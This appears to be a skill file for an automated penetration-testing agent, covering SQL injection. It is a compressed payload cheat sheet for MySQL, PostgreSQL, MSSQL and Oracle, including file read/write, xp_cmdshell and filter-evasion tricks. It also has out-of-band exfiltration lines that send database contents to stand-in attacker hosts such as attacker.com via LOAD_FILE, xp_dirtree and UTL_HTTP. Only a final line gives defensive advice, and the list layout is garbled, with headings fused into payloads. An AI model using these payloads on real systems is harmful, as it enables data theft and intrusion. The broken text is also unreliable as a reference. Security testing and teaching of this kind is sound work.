strix/skills/vulnerabilities/sql_injection.md
SQLi remains one of the most durable and impactful vulnerability classes. Modern exploitation focuses on parser differentials, ORM/query-builder edges, JSON/XML/CTE/JSONB surfaces, out-of-band exfiltration, and subtle blind channels. Treat every string concatenation into SQL as suspect.
Databases
Integration Paths
Input Locations
whereRaw/orderByRaw, string templates in ORMsError-Based
Boolean-Based
Time-Based
SLEEP/pg_sleep/WAITFOROut-of-Band (OAST)
@@version, database(), user(), current_user()extractvalue()/updatexml() (older), JSON functions for error shapingLOAD_FILE(), SELECT ... INTO DUMPFILE/OUTFILE (requires FILE privilege, secure_file_priv)LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))SLEEP(n), BENCHMARKJSON_EXTRACT/JSON_SEARCH with crafted paths; GIS funcs sometimes leakversion(), current_user, current_database()xpath() errors in xml2COPY (program ...) or dblink/foreign data wrappers (when enabled); http extensionspg_sleep(n)COPY table TO/FROM '/path' (requires superuser), lo_import/lo_export->, ->>, @>, ?| with lateral/CTE for blind extraction@@version, db_name(), system_user, user_name()xp_dirtree, xp_fileexist; HTTP via OLE automation (sp_OACreate) if enabledxp_cmdshell (often disabled), OPENROWSET/OPENDATASOURCEWAITFOR DELAY '0:0:5'; heavy functions cause measurable delaysFOR XML PATH leaksv$version, ora_database_name, userUTL_HTTP/DBMS_LDAP/UTL_INADDR/HTTPURITYPE (permissions dependent)dbms_lock.sleep(n)to_number/to_date conversions, XMLTypeUTL_FILE with directory objects (privileged)ORDER BY n and UNION SELECT null,...CAST/CONVERT; coerce to text/json for renderingSUBSTRING/ASCII, LEFT/RIGHT, or JSON/array operatorsAND (SELECT CASE WHEN (predicate) THEN pg_sleep(0.5) ELSE 0 END)xp_dirtree \\\\<data>.attacker.tld\\aUTL_HTTP.REQUEST('http://<data>.attacker')LOAD_FILE with UNC pathINTO OUTFILE/DUMPFILE, COPY TO, xp_cmdshell redirectionwhereRaw/orderByRaw, string interpolation into LIKE/IN/ORDER clauses@> in PostgreSQL) with raw fragmentsIN (...))CASE WHEN for boolean channelsMATCH AGAINST, to_tsvector/to_tsquery with payload mixingWhitespace/Spacing
/**/, /**/!00000, comments, newlines, tabs0xe3 0x80 0x80 (ideographic space)Keyword Splitting
UN/**/ION, U%4eION, backticks/quotes, case foldingNumeric Tricks
0x61646d696e)Encodings
char()/CONCAT_ws to build tokensClause Relocation
WITH), lateral joins to hide payload shapewhereRaw/orderByRawModern SQLi succeeds where authorization and query construction drift from assumptions. Bind parameters everywhere, avoid dynamic identifiers, and validate at the exact boundary where user input meets SQL.